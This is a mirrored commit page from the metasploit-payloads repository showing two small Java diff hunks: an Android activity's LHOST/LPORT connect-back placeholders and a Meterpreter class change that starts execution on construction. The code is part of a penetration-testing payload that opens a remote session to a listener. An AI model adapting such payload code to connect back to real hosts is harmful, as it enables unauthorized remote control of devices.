mirror of
https://github.com/rapid7/metasploit-payloads
synced 2024-11-20 14:39:22 +01:00
fix obvious breakage
This commit is contained in:
parent
7b8b36f8b9
commit
cbdda49ed7
@ -15,7 +15,7 @@ public class MainActivity extends Activity
|
|||||||
{
|
{
|
||||||
// avoid re-ordering the strings in classes.dex - append XXXX
|
// avoid re-ordering the strings in classes.dex - append XXXX
|
||||||
private static final String LHOST = "XXXX127.0.0.1 ";
|
private static final String LHOST = "XXXX127.0.0.1 ";
|
||||||
private static final String LPORT = "XXXX4444 ";
|
private static final String LPORT = "YYYY4444 ";
|
||||||
|
|
||||||
@Override
|
@Override
|
||||||
public void onCreate(Bundle savedInstanceState)
|
public void onCreate(Bundle savedInstanceState)
|
||||||
|
@ -86,6 +86,9 @@ public class Meterpreter {
|
|||||||
errBuffer = null;
|
errBuffer = null;
|
||||||
err = System.err;
|
err = System.err;
|
||||||
}
|
}
|
||||||
|
if (beginExecution) {
|
||||||
|
startExecuting();
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
public void startExecuting() throws Exception {
|
public void startExecuting() throws Exception {
|
||||||
|
Loading…
Reference in New Issue
Block a user